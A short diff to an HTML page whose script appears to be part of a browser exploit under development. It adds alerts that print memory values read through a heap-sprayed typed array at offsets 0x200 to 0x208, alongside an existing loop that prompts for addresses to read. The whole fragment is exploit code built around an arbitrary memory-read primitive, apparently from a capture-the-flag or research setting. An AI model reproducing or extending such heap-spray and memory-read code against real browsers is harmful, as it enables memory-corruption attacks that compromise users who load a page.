--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start66");
+alert("start666");
 var flag=prompt("flag");
 if(flag!=0){
  
@@ -216,6 +216,9 @@ b+=s1.charCodeAt(a+7).toString(16);
 alert(b);
 }
 alert(func());
+alert("0x200: "+spray[spray_index][typedarray_index+0x200/4].toString(16));
+alert("0x204: "+spray[spray_index][typedarray_index+0x204/4].toString(16));
+alert("0x208: "+spray[spray_index][typedarray_index+0x208/4].toString(16));
 while(1){
 a=prompt("addr");
 b="";
